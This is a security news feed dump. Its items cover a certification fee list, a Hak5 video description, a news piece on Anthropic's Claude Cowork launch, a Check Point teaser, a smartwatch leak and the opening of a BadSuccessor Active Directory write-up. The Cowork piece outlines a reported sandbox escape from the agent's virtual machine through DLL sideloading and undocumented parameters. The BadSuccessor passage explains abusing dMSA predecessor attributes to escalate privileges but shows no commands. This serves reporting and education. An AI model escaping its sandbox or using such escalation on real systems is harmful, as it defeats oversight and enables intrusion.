<p>To become a <a href="https://www.checkpoint.com/services/training/certification-program/">Check Point Certified Security Master (CCSM) </a>security professionals must have an active Certified Security Expert (CCSE) and mast have completed two subsequent Check Point Specialist accreditations. CCSM validates advanced expertise in configuring, deploying, and troubleshooting Check Point solutions. Check Point certifications are valid for 24 months.</p>



<p><strong>Training fees:</strong><a href="https://www.isc2.org/training/online-self-paced/cissp-online-self-paced"></a> <a href="https://securityservices.checkpoint.com/categories/trainingprograms">Training for CCSE</a> is $3,500</p>



<p><strong>Exam fee:</strong> The fee for CCSE is $300</p>



<h2 class="wp-block-heading">GIAC Experienced Cybersecurity Specialist (GX-CS)</h2>



<p>The <a href="https://www.giac.org/certifications/experienced-cyber-security-gxcs">Experienced Cybersecurity Specialist (GX-CS)</a> sits within the applied knowledge certifications with GIAC. The certification is for practitioners to show their qualifications for advanced, hands-on IT systems roles across cybersecurity. Its intent is to demonstrate the candidate can navigate evolving real-world threats. The certification covers five areas: network security analysis and tools; evaluation of Windows and Linux OS security; advanced security tools and techniques; common attacks and defenses; and implementing overall cybersecurity and information security. The GX-CS is for <a href="https://www.giac.org/certifications/security-essentials-gsec">GSEC</a> holders who acquired additional experience — the GSEC exam costs $999, and SANS Institute offers <a href="https://www.sans.org/cyber-security-courses/security-essentials">training</a> for GSEC.</p>



<p><strong>Training fees:</strong><a href="https://www.isc2.org/training/online-self-paced/cissp-online-self-paced"></a> There are a few related affiliate training programs provided by SANS, each costing approximately $9,000.</p>



<p><strong>Exam fee: </strong>$499 for those with an active GSEC; otherwise <a href="https://www.giac.org/pricing">$1,299</a>.</p>



<h2 class="wp-block-heading">OffSec Certified Professional (OSCP+)</h2>



<p>To earn the<a href="https://www.offsec.com/courses/pen-200/"> </a><a href="https://www.offsec.com/courses/pen-200/">OffSec Certified Professional</a> certification, candidates must complete the affiliated course, PEN-200: Penetration Testing with Kali Linux, and pass the subsequent exam. The course covers 20 plus modules, including information gathering, vulnerability scanning, encryption and cryptography, Active Directory and AWS exploitation, and more. Certificate holders will have shown mastery of penetration testing methodologies ideal for new roles, such as an ethical hacker, incident responder, or threat hunter. The OSCP+ exam is entirely hands-on, and test-takers must compromise systems within a lab environment.</p>



<p>OffSec does not enforce any prerequisites but recommends candidates be familiar with TCP/IP networking, scripting in Bash and Python, and Linux and Windows, which they can learn through its<a href="https://www.offsec.com/learning/paths/network-penetration-testing-essentials/"> </a><a href="https://www.offsec.com/learning/paths/network-penetration-testing-essentials/">Network Penetration Testing Essentials Learning Path</a>.</p>



<p><strong>Training and exam fees:</strong> OffSec bundles the course and exam for $1,749 and as a yearly subscription that includes access to one 200 or 300-level course, the associated labs, and two exam attempts for $2,749 annually.</p>



<h2 class="wp-block-heading">OffSec Experienced Penetration Tester (OSEP)</h2>



<p>The<a href="https://www.offsec.com/courses/pen-300/"> </a><a href="https://www.offsec.com/courses/pen-300/">OffSec Experienced Penetration Tester</a> is ideal for penetration testers and ethical hackers who need more advanced techniques to sharpen offensive skills against modern enterprise defenses. Across more than 20 modules, the certification introduces these professionals to advanced offensive techniques, EDR and AV evasion, advanced Windows offensive security and more. During the two-day proctored exam, professionals must connect to a lab environment via a VPN and compromise multiple machines within a network through several possible attack paths. To pass, professionals must achieve the objective stated within the control panel or score at<a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ"> </a><a href="https://help.offsec.com/hc/en-us/articles/360049781352-OSEP-Exam-FAQ">least 100 points</a> — 10 points are awarded for every flag found in a local.txt or proof.txt file. Professionals who earn their OSEP can also obtain their<a href="https://www.offsec.com/certificates/osce3/"> </a><a href="https://www.offsec.com/certificates/osce3/">OSCE³ Certification</a> to demonstrate their mastery of offensive security. They would also need to pass the exams for WEB-300: Advanced Web Attacks and Exploitation and EXP-301: Windows User Mode Exploit Development, after which the OSCE³ is automatically awarded.</p>



<p>While there are no formal prerequisites for OSEP, OffSec recommends candidates take the<a href="https://www.offsec.com/courses/pen-200/"> </a><a href="https://www.offsec.com/courses/pen-200/">PEN-200: Penetration Testing</a> with Kali Linux or have a strong foundation in operating systems, networking, and scripting. </p>



<p><strong>Training and exam fees:</strong> OffSec bundles the course and exam for $1,749, and as a yearly subscription that includes access to one 200 or 300-level course, the associated labs, and two exam attempts for $2,749 annually.</p>



<h2 class="wp-block-heading">OffSec Exploitation Expert (OSEE)</h2>



<p>OffSec’s <a href="https://www.offsec.com/courses/exp-401/">Offensive Security Exploitation Expert</a> is a vendor-specific certification, focusing on advanced Windows exploitation, with OffSec deeming it its most challenging certification. As a penetration testing course, the material dives deep into topics such as advanced heap manipulations and disarming WDEG mitigations. Certificate holders can identify problematic code in Windows operating systems and develop exploits. For the practical exam, candidates must complete a comprehensive penetration test of software and create an exploit within a lab environment — all within 72 hours. To qualify, you must have experience debugging, developing Windows exploits, and using the following technologies: WinDBG, x86_64, IDA Pro, and basic C/C++ programming. OffSec recommends completing its<a href="https://www.offsec.com/courses-and-certifications/"> </a><a href="https://www.offsec.com/courses-and-certifications/">300-level certifications</a> before OSEE.</p>



<p><strong>Training and exam fees:</strong> OffSec offers only instructor-led, in-person training. Enterprises should <a href="https://www.offsec.com/organizations/live-training/">inquire for more information</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA["Harvest Now, Decrypt Later" —The New Reality for Tech Infrastructure | Threat Wire]]></title>
<description><![CDATA[Author: Hak5 - Bewertung: 72x - Views:372 ⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️


@endingwithali →
Twitch: https://twitch.tv/endingwithali
Twitter: https://twitter.com/endingwithali
YouTube: https://youtube.com/@endingwithali
Everywhere else: https://links.ali.dev

Want to work with Ali?...]]></description>
<link>https://tsecurity.de/de/3653033/it-security-video/harvest-now-decrypt-later-the-new-reality-for-tech-infrastructure-threat-wire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653033/it-security-video/harvest-now-decrypt-later-the-new-reality-for-tech-infrastructure-threat-wire/</guid>
<pubDate>Wed, 08 Jul 2026 03:33:32 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Hak5 - Bewertung: 72x - Views:372 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/b2vKg8uag5o?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️<br />
<br />
<br />
@endingwithali →<br />
Twitch: https://twitch.tv/endingwithali<br />
Twitter: https://twitter.com/endingwithali<br />
YouTube: https://youtube.com/@endingwithali<br />
Everywhere else: https://links.ali.dev<br />
<br />
Want to work with Ali? hak5@endingwithali.com<br />
<br />
[❗] Join the Patreon→ https://patreon.com/threatwire<br />
0:00 0 - Intro<br />
1 - US Moves Post Quantum<br />
2 - 5 Eyes Talks AI<br />
3 - Secret Encryption Removal<br />
4 - Bsides<br />
5 - Outro<br />
<br />
LINKS<br />
🔗 Story 1: US Moves Post Quantum<br />
https://www.whitehouse.gov/presidential-actions/2026/06/securing-the-nation-against-advanced-cryptographic-attacks/<br />
https://thehackernews.com/2026/06/trump-order-sets-2030-deadline-for.html<br />
https://www.nist.gov/news-events/news/2024/08/nist-releases-first-3-finalized-post-quantum-encryption-standards<br />
https://f1tym1.com/2026/06/23/white-house-executive-order-sets-2030-2031-post-quantum-cryptography-deadline-for-federal-systems/<br />
🔗 Story 2: 5 Eyes Talks AI<br />
https://www.ncsc.gov.uk/news/the-ai-shift-in-cyber-risk-why-leaders-must-act-now<br />
https://www.ncsc.gov.uk/sites/default/files/2026-06/Five-Eyes-cyber-security-agencies-statement-ai-shift.pdf<br />
https://securitybrief.com.au/story/five-eyes-ai-cyber-warning-prompts-calls-for-faster-defence<br />
https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/4523810/five-eyes-cyber-security-agencies-statement/<br />
<br />
🔗 Story 3: Secret Encryption Removal<br />
https://arstechnica.com/security/2026/06/following-user-outcry-amd-reinstates-memory-encryption-in-consumer-cpus/<br />
https://arstechnica.com/security/2026/06/following-user-outcry-amd-reinstates-memory-encryption-in-consumer-cpus/<br />
🔗 Story 4: Bsides<br />
https://blog.lastpass.com/posts/klue-supply-chain-incident-and-lastpass-response<br />
https://www.bleepingcomputer.com/news/security/polymarket-customers-lose-3-million-in-supply-chain-attack/<br />
https://www.bleepingcomputer.com/news/security/polymarket-customers-lose-3-million-in-supply-chain-attack/<br />
<br />
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆<br />
Our Site → https://www.hak5.org<br />
Shop →  http://hakshop.myshopify.com/<br />
Community → https://www.hak5.org/community<br />
Subscribe → https://www.youtube.com/user/Hak5Darren?sub_confirmation=1<br />
Support → https://www.patreon.com/threatwire<br />
Contact Us → http://www.twitter.com/hak5<br />
____________________________________________<br />
<br />
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic brings Claude Cowork to mobile and web as usage data shows most users aren’t coding]]></title>
<description><![CDATA[Anthropic on Tuesday launched Claude Cowork on mobile and web, expanding a tool that has quietly become the company's bridge between the developer-centric world of AI coding agents and the far larger market of knowledge workers who never open a terminal.The rollout, which begins in beta with Max ...]]></description>
<link>https://tsecurity.de/de/3652421/it-nachrichten/anthropic-brings-claude-cowork-to-mobile-and-web-as-usage-data-shows-most-users-arent-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652421/it-nachrichten/anthropic-brings-claude-cowork-to-mobile-and-web-as-usage-data-shows-most-users-arent-coding/</guid>
<pubDate>Tue, 07 Jul 2026 20:03:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a> on Tuesday launched <a href="https://claude.com/blog/cowork-web-mobile/">Claude Cowork on mobile and web</a>, expanding a tool that has quietly become the company's bridge between the developer-centric world of AI coding agents and the far larger market of knowledge workers who never open a terminal.</p><p>The rollout, which begins in beta with <a href="https://support.claude.com/en/articles/11049741-what-is-the-max-plan">Max subscribers</a> before expanding to additional plans, marks a strategic inflection for Anthropic. It transforms Cowork from a desktop-only agent into a cross-device platform where tasks can start on a laptop, continue autonomously in the background, and be reviewed from a phone — even after the user closes the app entirely.</p><p>"Your work goes everywhere with you, and keeps going without you," Anthropic writes in its announcement.</p><p>The timing is deliberate. Alongside the mobile launch, Anthropic published usage data from 1.2 million anonymized Claude Cowork sessions sampled between May 11 and May 31, drawn from more than 600,000 organizations. The data paints a striking picture: the overwhelming majority of what people do with Cowork has nothing to do with writing software.</p><div></div><h2><b>The biggest AI story nobody's talking about</b></h2><p>The numbers tell a story that cuts against the dominant narrative in enterprise AI, which has fixated on coding assistants and developer productivity as the primary use case for large language models.</p><p>Business process and operations — tasks like pulling scattered updates into a single report, building onboarding checklists, and reconciling spreadsheets — accounted for 33.4% of all sampled Cowork sessions, making it the single largest category by a wide margin. Content creation and copywriting — producing drafts, slide decks, posts, and proposals — came in second at 16.4%.</p><p>Together, those two categories make up roughly half of all Claude Cowork usage. Software development, by contrast, accounted for just 8.7%. DevOps and infrastructure followed at 7%, with research and intelligence at 6.4%, data analysis and business intelligence at 5.8%, document processing and extraction at 4.1%, and sales and revenue operations at 4%.</p><p>The remaining 12 categories each represented less than 4% of usage, including personal assistance at 3.8%, education at 2.4%, and meeting intelligence at 1.8%.</p><p>Anthropic describes these dominant use cases as "the work around the work" — tasks that span nearly every role in an organization but rarely appear in anyone's core job description. "People are using it for a variety of tasks that aren't necessarily the hallmark of a specific role, but instead represent the connective work around a role that moves projects forward and keeps businesses running," the company writes. "That means tasks like drafting a status update, building a slide deck, or condensing reams of research into a single report."</p><p>That phrase — "the work around the work" — is Anthropic's attempt to define and claim an entirely new category of AI productivity. It's a calculated reframing: rather than positioning AI as a tool that replaces what professionals do, Anthropic is arguing that the most valuable current application is handling everything professionals do around their actual expertise.</p><h2><b>What mobile access changes — and what it doesn't</b></h2><p>The <a href="https://claude.com/blog/cowork-web-mobile/">expansion to mobile and web</a> introduces three concrete capabilities that reflect how Anthropic envisions Cowork fitting into daily workflows.</p><p>First, sessions now sync across devices. A user can start a task at their desk, check on its progress from a phone, and retrieve the finished output from any device. Second — and arguably more significant — Cowork can now run tasks in the background with no device online at all. Users can schedule work for a specific time, and Claude will execute it autonomously. Anthropic offers the example of setting Monday morning client prep for 6 a.m.: "Claude works through the email threads, transcripts, and recent news, builds the briefing doc, and leaves the follow-up email drafted but unsent. Review it over coffee."</p><p>Third, when Claude encounters a decision that requires human judgment, it surfaces the question to the user's phone. "Nothing ships until you've reviewed and approved it," Anthropic states.</p><p>Desktop remains the most fully featured surface, with access to local files and the browser. But the web version also opens Cowork to users who cannot install a desktop application — a meaningful expansion in enterprise environments where IT departments control software installation.</p><p>The company also unified its interface: on web and desktop, chat and Cowork now share a single home screen, and projects and artifacts persist across both modes.</p><p>To encourage adoption, Anthropic is extending doubled Cowork usage limits through August 5.</p><h2><b>The strategic logic: why Anthropic is chasing the non-developer</b></h2><p>The usage data and the mobile launch together reveal a company executing a two-track strategy. <a href="https://www.anthropic.com/product/claude-code">Claude Code</a>, its terminal-based coding agent, dominates among software developers. But Cowork is designed to capture the vastly larger population of professionals whose work involves creating, organizing, and communicating information rather than writing code.</p><p>The contrast between the two products is instructive. As Anthropic notes, Claude Code "is most often used by software developers for the key parts of their role: building, debugging, and shipping code." When developers do use <a href="https://www.anthropic.com/product/claude-cowork">Cowork</a>, they tend to use it not for programming but for the communications-focused work that surrounds every role — status updates, documentation, and coordination.</p><p>This pattern — where AI handles the connective tissue of work rather than its core substance — aligns with what Anthropic describes as people using "Claude Cowork to assemble and structure the information they can use to act on their expertise." The company illustrates this with three examples: a lawyer using Cowork for document formatting and filing while reserving legal judgment for themselves, a hiring manager synthesizing interview feedback while spending more time on candidate conversations, and a team lead producing a slide deck that explains a decision while focusing on actually making that decision.</p><p>The implications for Anthropic's business model are significant. Developer-focused tools, while high-profile, serve a relatively narrow market. The <a href="https://ramp.com/data/ai-index">Ramp AI Index</a> published in May showed Anthropic pulling ahead of OpenAI in business adoption for the first time — with 34.4% of firms paying for Anthropic's services compared to OpenAI's 32.3% — and suggests the company's enterprise push is gaining traction. Claude Code was identified as the primary driver of that shift. But Cowork targets an addressable market that is orders of magnitude larger: every knowledge worker with a laptop, a pile of spreadsheets, and a slide deck due by Friday.</p><h2><b>A crowded field gets more competitive</b></h2><p>The mobile launch arrives during one of Anthropic's busiest — and most turbulent — stretches in its history. </p><p>Just last week, Anthropic launched <a href="https://www.anthropic.com/news/claude-sonnet-5">Claude Sonnet 5</a>, a new model that narrows the performance gap with its more expensive Opus-class models while maintaining lower pricing. The model is available at introductory pricing of $2 per million input tokens through August 31 before rising to $3 per million input tokens. Sonnet 5 serves as the engine underneath Cowork, and its improved agentic capabilities — better reasoning, tool use, and sustained task completion — directly enhance Cowork's ability to handle complex, multi-step workflows.</p><p>Two weeks before that, Anthropic released <a href="https://venturebeat.com/technology/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously">Claude Tag</a>, a Slack-native AI agent designed for team collaboration. Where Cowork focuses on individual task delegation, Claude Tag operates as a multiplayer tool — a single Claude identity that everyone in a Slack channel can interact with, building context from conversations over time. </p><p>According to Anthropic's announcement, 65% of the company's own product team's code is created by its internal version of Claude Tag. <a href="https://fortune.com/2026/06/23/anthropic-claude-tag-virtual-employee-tool-slack/">Fortune reported</a> that Anthropic's head of product for Claude Code and Cowork, Cat Wu, described the distinction: "Claude Code, Cowork, and chat are very single-player, whereas Claude Tag is built to be interactive and multiplayer."</p><p>Together, <a href="https://www.anthropic.com/product/claude-cowork">Cowork</a> and <a href="https://www.anthropic.com/news/introducing-claude-tag">Claude Tag</a> represent a pincer strategy: Cowork captures individual productivity workflows across devices, while Claude Tag embeds AI into team communication channels. Both are designed to push Anthropic deeper into enterprise operations, beyond the developer seat.</p><h2><b>The security question looms</b></h2><p>The expansion also arrives against a backdrop of unresolved security concerns. On July 1, security firm Armadin — led by Mandiant founder Kevin Mandia — published research detailing what it described as a full sandbox escape in Claude Cowork on Windows, as reported by <a href="https://siliconangle.com/2026/07/01/armadin-details-full-sandbox-escape-claude-cowork-anthropic-disputes-risk/">SiliconANGLE</a>. The attack chain involved DLL sideloading against the Claude desktop executable to gain trusted access to Cowork's virtual machine service, then exploiting undocumented parameters to achieve root access and bypass network restrictions.</p><p>Anthropic responded that the vulnerability did not qualify as a security issue because exploiting it requires an attacker to already have local code execution on the host machine. Armadin, however, raised a broader concern: that deploying local virtual machines on nontechnical users' systems creates visibility gaps that endpoint security products struggle to monitor.</p><p>This tension takes on new dimensions as Cowork moves to mobile and web. The web and mobile versions run tasks server-side rather than in a local virtual machine, which eliminates the specific attack surface Armadin identified but introduces different questions about data handling, especially for scheduled background tasks that process email threads, calendar data, and documents without real-time user oversight.</p><p>Anthropic's announcement states that "<a href="https://claude.com/blog/cowork-web-mobile/">the decisions still come to you</a>" and that nothing ships without review and approval. But as Cowork takes on increasingly complex autonomous workflows — processing contract folders, building client briefings from multiple data sources, drafting emails — the surface area for prompt injection and data exposure grows correspondingly. </p><p>When Cowork first launched in January, TechCrunch reported that Anthropic <a href="https://techcrunch.com/2026/01/12/anthropics-new-cowork-tool-offers-claude-code-without-the-code/">explicitly warned</a> about prompt injection risks, noting in its blog post: "These risks aren't new with Cowork, but it might be the first time you're using a more advanced tool that moves beyond a simple conversation."</p><h2><b>As Anthropic courts enterprises, geopolitics complicates the pitch</b></h2><p>Anthropic's enterprise push is also colliding with geopolitical reality. CNBC reported Monday that <a href="https://www.cnbc.com/2026/07/06/alibaba-anthropic-ai-ban-claude-china.html#:~:text=Alibaba%20will%20ban%20employees%20from%20using%20Anthropic%20's%20artificial%20intelligence,risks%2C%20CNBC%20confirmed%20on%20Monday.">Alibaba will ban employees from using Anthropic's AI tools</a> starting July 10, placing Claude Code on a high-risk software list. The move followed Anthropic's June letter to the U.S. Senate accusing Alibaba of carrying out what it called "<a href="https://www.reuters.com/world/china/anthropic-says-alibaba-illicitly-extracted-claude-ai-model-capabilities-2026-06-24/">the largest known distillation attack</a>" against its models.</p><p>The Alibaba ban, combined with reports that Anthropic is closing loopholes that allowed Chinese companies to access Claude through third-country entities, underscores the increasingly fraught environment for AI companies attempting to serve global enterprise customers while navigating U.S. export and security restrictions.</p><p>At the same time, Anthropic is investing massively in infrastructure. Reuters reported Monday that <a href="https://www.reuters.com/business/terawulf-jumps-19-billion-data-center-lease-deal-with-anthropic-2026-07-06/">Anthropic signed a $19 billion, 20-year lease with TeraWulf for a data center</a> being built in Hawesville, Kentucky, with 401 megawatts of computing power expected to become fully operational in 2028.</p><p>That kind of capital commitment only makes sense if the company expects enterprise demand — not just from developers, but from the millions of knowledge workers that Cowork targets — to grow dramatically.</p><h2><b>Anthropic's own usage report comes with notable blind spots</b></h2><p>Anthropic is transparent about the limitations of its usage analysis. The taxonomy classifies sessions by the type of work being performed, not by the job title of the person doing it. </p><p>There are no standalone categories for marketing, finance, or HR — functions that are likely absorbed into the dominant "business process and operations" bucket, which may partly explain why that category commands a third of all usage.</p><p>The sample is also rate-capped rather than proportional to traffic, meaning the numbers are shares of sampled sessions, not absolute volumes. Usage during peak hours is somewhat underrepresented. And roughly 5% of sampled sessions involved personal, non-work use — hobbies, personal assistance, and companionship-style conversations — meaning the data doesn't purely reflect workplace activity.</p><p>The company also acknowledged that its labeling pipeline changed around May 11, which is why the analysis window begins on that date rather than covering a longer period.</p><h2><b>What Cowork's rise says about the future of enterprise AI</b></h2><p>Anthropic's <a href="https://claude.com/blog/cowork-web-mobile/">mobile launch</a> and usage data arrive at a moment when the enterprise AI market is shifting from proof of concept to proof of value. The question facing every company deploying AI tools is no longer whether the technology works — but whether it delivers measurable productivity gains across an organization, not just within engineering teams.</p><p>The usage data suggests that the answer, at least for Cowork, is emerging in an unexpected place. It's not in the glamorous work of building software or conducting research. It's in the unglamorous, universal labor of turning messy information into structured outputs that move organizations forward — the status reports, the onboarding checklists, the variance memos, the client decks.</p><p>By untethering that capability from the desktop and making it available on every device, Anthropic is betting that the most valuable AI agent isn't the one that writes code. It's the one that handles everything else.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Unified Policies Close Security Gaps]]></title>
<description><![CDATA[As organizations adopt both on-premises firewalls and cloud-delivered SASE, security becomes more distributed and complex. Users connect from headquarters, branch offices, and remote locations, expecting the same secure and seamless internet experience everywhere. When Internet Access policies ac...]]></description>
<link>https://tsecurity.de/de/3651830/it-security-nachrichten/how-unified-policies-close-security-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651830/it-security-nachrichten/how-unified-policies-close-security-gaps/</guid>
<pubDate>Tue, 07 Jul 2026 16:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As organizations adopt both on-premises firewalls and cloud-delivered SASE, security becomes more distributed and complex. Users connect from headquarters, branch offices, and remote locations, expecting the same secure and seamless internet experience everywhere. When Internet Access policies across firewalls and SASE…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/how-unified-policies-close-security-gaps/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/how-unified-policies-close-security-gaps/">How Unified Policies Close Security Gaps</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Unified Policies Close Security Gaps]]></title>
<description><![CDATA[As organizations adopt both on-premises firewalls and cloud-delivered SASE, security becomes more distributed and complex. Users connect from headquarters, branch offices, and remote locations, expecting the same secure and seamless internet experience everywhere. When Internet Access policies ac...]]></description>
<link>https://tsecurity.de/de/3651736/it-security-nachrichten/how-unified-policies-close-security-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651736/it-security-nachrichten/how-unified-policies-close-security-gaps/</guid>
<pubDate>Tue, 07 Jul 2026 15:51:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="800" src="https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner.png 1600w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-300x150.png 300w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-1024x512.png 1024w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-768x384.png 768w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-1536x768.png 1536w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-400x200.png 400w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-600x300.png 600w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-800x400.png 800w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-1200x600.png 1200w, https://blog.checkpoint.com/wp-content/uploads/2026/07/Unified_Access_Policy-Banner-1320x660.png 1320w" sizes="(max-width: 1600px) 100vw, 1600px"><p>As organizations adopt both on-premises firewalls and cloud-delivered SASE, security becomes more distributed and complex. Users connect from headquarters, branch offices, and remote locations, expecting the same secure and seamless internet experience everywhere. When Internet Access policies across firewalls and SASE are managed separately, maintaining consistency becomes harder, increasing the risk of human error and misconfiguration.  The 2026 Verizon Data Breach Investigations Report found that misconfiguration is one of the top recurring error types in breaches year after year, noting that, “the fact that Misconfiguration remains among the top errors over time is rather concerning.” In environments with separate Internet Access policies, that risk is […]</p>
<p>The post <a href="https://blog.checkpoint.com/hybrid-mesh/how-unified-policies-close-security-gaps/">How Unified Policies Close Security Gaps</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Galaxy Watch Ultra 2 Leaked: Bigger Battery, Brighter Screen, Same Looks video]]></title>
<description><![CDATA[Leaked images of the Galaxy Watch Ultra 2 are everywhere, and while the design looks nearly identical to the original, there's a lot happening under the hood. We're talking a potential jump to 5,000 nits of brightness, a bigger battery, a new Qualcomm Snapdragon Wear Elite chip with 5G RedCap, an...]]></description>
<link>https://tsecurity.de/de/3651584/it-nachrichten/galaxy-watch-ultra-2-leaked-bigger-battery-brighter-screen-same-looks-video/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651584/it-nachrichten/galaxy-watch-ultra-2-leaked-bigger-battery-brighter-screen-same-looks-video/</guid>
<pubDate>Tue, 07 Jul 2026 15:03:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Leaked images of the Galaxy Watch Ultra 2 are everywhere, and while the design looks nearly identical to the original, there's a lot happening under the hood. We're talking a potential jump to 5,000 nits of brightness, a bigger battery, a new Qualcomm Snapdragon Wear Elite chip with 5G RedCap, and a tighter Samsung Health integration. Iyaz breaks down everything leaked so far.]]></content:encoded>
</item>
<item>
<title><![CDATA[BadSuccessor — Exploiting delegated Managed Service Accounts in Windows Server 2025]]></title>
<description><![CDATA[Understanding what is delegated Managed Service Accounts in Windows Server 2025, and how an unpatched system may be exploited for Privilege Escalation in an Active Directory environmentIn doing a recent HackTheBox room, I came across this relatively new vulnerability of delegated Managed Service ...]]></description>
<link>https://tsecurity.de/de/3651409/hacking/badsuccessor-exploiting-delegated-managed-service-accounts-in-windows-server-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651409/hacking/badsuccessor-exploiting-delegated-managed-service-accounts-in-windows-server-2025/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Understanding what is delegated Managed Service Accounts in Windows Server 2025, and how an unpatched system may be exploited for Privilege Escalation in an Active Directory environment</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/600/1*-07tITqbnkehba3fysVMFA.png"></figure><p>In doing a recent HackTheBox room, I came across this relatively new vulnerability of delegated Managed Service Accounts, and wanted to find out more about the BadSuccessor exploit. This <a href="https://tryhackme.com/room/adbadsuccessor">TryHackMe room</a> was particularly helpful. Easy as it looked, I ran into many odd errors and took a couple of days troubleshooting and figuring things out.</p><p>In this article, we will examine:</p><ul><li>The basics of what delegated Managed Service Accounts is</li><li>The flaw of missing permission checks in unpatched Windows Server 2025</li><li>The theory of the exploit</li><li>Step-by-step PoC exploit using the Tryhackme room, in both Windows and Kali Linux platforms</li></ul><p><em>Imagine a large company that uses an automated HR system to manage employee accounts. When an employee leaves the company, their replacement can be set up in the system to take over their role and access permissions.</em></p><p><em>The </em><strong><em>“BadSuccessor” flaw</em></strong><em> works like this:</em></p><ul><li><strong><em>The Fake Profile:</em></strong><em> You are a low-level employee in the company. Using the HR system, you create a brand-new employee account for yourself.</em></li><li><strong><em>The False Claim:</em></strong><em> During the account setup, there is a field that asks:<br> “Is this account replacing an existing employee?” You select </em><strong><em>“Yes”</em></strong><em>, and in the replacement field you type the name of the </em><strong><em>Chief Financial Officer (CFO)</em></strong><em>. You also check a box that says </em><strong><em>“Employee transition complete.”</em></strong></li><li><strong><em>The Lack of Verification:</em></strong><em> The HR system is programmed to trust whatever is written in the replacement form. It does not verify with HR management or the CFO whether a real replacement is happening.</em></li><li><strong><em>The Result:</em></strong><em> The system automatically transfers the CFO’s access permissions to your new account, granting you access to sensitive financial systems and executive resources.</em></li></ul><p><em>You didn’t steal the CFO’s password or hack their account; you simply created a new identity and declared yourself the official successor to their position — and the system believed you. Now you have an account with the CFO’s privileges!</em></p><h3>1. The Basics — Delegated Managed Service Accounts</h3><p>To understand the attack, you first have to understand the “tool” being used. Windows Server 2025 introduced <strong>Delegated Managed Service Accounts (dMSAs)</strong>.</p><p>Traditional service accounts often use static passwords that rarely change, which creates a major security risk. A dMSA allows administrators to transition these legacy accounts into managed service accounts while preserving the permissions and identity that existing services rely on.</p><p>To make this migration happen, Windows uses two specific “labels” (attributes) on the dMSA object:</p><h4>1.1. The Predecessor Link (msDS-ManagedAccountPrecededByLink)</h4><p>This is like a pointer. You create a new dMSA and tell it, “You are the successor to <strong>Admin_User_Account</strong>.” You do this by putting the name of the Admin account into this attribute.</p><h4>1.2. The Migration State (msDS-DelegatedMSAState)</h4><p>This is a status tracker. It tells Windows how far along the migration is. It uses numbers to represent the stage:</p><ul><li><strong>0:</strong> Not started.</li><li><strong>1:</strong> In progress.</li><li><strong>2:</strong> <strong>Completed.</strong></li></ul><p>When the state is set to <strong>2 (Completed)</strong>, the Windows Domain Controller (the KDC) says: <em>“Okay, the migration is completed. This new dMSA is now the official replacement. I will give this dMSA all the powers and group memberships that the old account used to have.”</em></p><h3>2. The Core Flaw: Missing Permission Checks</h3><p>Now that we know what a <strong>dMSA</strong> is, we can look at the “crack” in the system. The security flaw isn’t in the dMSA itself, but in <strong>how the link is made</strong>.</p><p>Normally, in Active Directory, if you want to change someone else’s account, you need high-level permissions. However, the dMSA introduction created a “logic gap”:</p><ol><li><strong>Creation Rights:</strong> If you are a low-level admin (like 